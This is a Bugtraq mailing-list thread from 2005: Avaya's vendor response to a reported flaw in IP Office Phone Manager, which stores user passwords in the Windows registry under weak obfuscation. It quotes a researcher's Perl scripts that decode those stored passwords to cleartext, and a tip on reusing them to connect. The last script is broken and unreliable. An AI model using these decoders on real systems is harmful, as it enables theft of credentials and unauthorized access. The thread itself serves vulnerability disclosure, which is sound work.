Avaya is aware and currently investigating this issue. Once our investigation is complete we will release an Avaya Security Advisory to address the outlined concerns. In the interim, we've asked Mitre to assign a Common Vulnerability and Exposures (CVE) candidate number for this issue. They have assigned CAN-2005-0506: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0506 Congruent with generally acceptable security practices, Avaya recommends that customers restrict remote and local access to their systems to reduce risks. Alternatively, customers may choose not to utilize the "Remember save password" feature in order to prevent a user's password from being stored in the Windows registry. Please note the Avaya Product Security Support Team (PSST) takes the security of Avaya products seriously. We would like to develop a relationship with our customers and the public to encourage them to forward vulnerabilities to us. Please send information regarding any discovered security problems with Avaya products to securityalerts[at]avaya.com. I, or someone on the PSST, will work directly to validate the problem and coordinate a response; including an acknowledgement for working with us to help protect customers. John Walton, CISSP Lead Security Engineer Product Security Support Team (PSST) Avaya, Inc. -----Original Message----- From: grutz@xxxxxxxxxxxxxx [mailto:grutz@xxxxxxxxxxxxxx] Sent: Tuesday, February 22, 2005 12:06 PM To: bugtraq@xxxxxxxxxxxxxxxxx Subject: Re: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability On Tue, Feb 22, 2005 at 11:29:52PM -0000, m123303@xxxxxxxxxxxxxx wrote: > I suspect there is a vulnerability in Avaya IP Office Phone Manager You suspect correctly. >From some research we did with this product: http://www.avaya.com/gcm/master-usa/en-us/products/offers/softphone.htm > [HKEY_LOCAL_MACHINE\SOFTWARE\Avaya\IP400\Generic] > "UserName"="Joe Smith" > "Password"="" > "PBXAddress"="10.154.1.60" Our values were found in a different registry location but i'm willing to bet the obfuscation is the same. One method of attack is to simply place the stored password in your own registry and hit connect. It's only there because people are lazy and just want their phones to work. It's easily reversable: ----- 8< --- [ snippy snippy bad code ] --- >8 ---- #!/usr/bin/perl $avayapw=shift; my $pwlength = ord(substr($avayapw, 0, 1)) - 33; my $startpoint = ($pwlength * 7) % 55; print "Password length: $pwlength\n"; print " Start position: $startpoint\n"; print "\nYour password is: " . substr($avayapw, $startpoint, 1); my $byte = $startpoint; for ( my $a = 1; $a<$pwlength; $a++) { $nextbyte = $byte - 7; if ($nextbyte < 0) { $nextbyte = 55 - (7 - $byte); } $byte = $nextbyte; print substr($avayapw, $byte, 1); } ----- 8< --- [ snippy snippy bad code ] --- >8 ---- Shorter: #!/usr/bin/perl $a=shift; $l=ord(substr($a,0,1))-33; for $c ( 1 .. $l ) { print substr($a, (((($l-$c)+1)*7)%55), 1); } ----- 8< --- [ snippy snippy bad code ] --- >8 ---- And something more fun: #!/usr/bin/perl use Win32::Registry; $::HKEY_CURRENT_USER->Open("Software\\Avaya\\iClarity\\Options", $hKey) or die "Can't open: $^E\n"; $l=ord(substr($value,0,1))-33; for $c ( 1 .. $l ) { print substr($a, (((($l-$c)+1)*7%55), 1); } -- ..:[ grutz at jingojango dot net ]:.. GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4 "There's just no amusing way to say, 'I have a CISSP'."
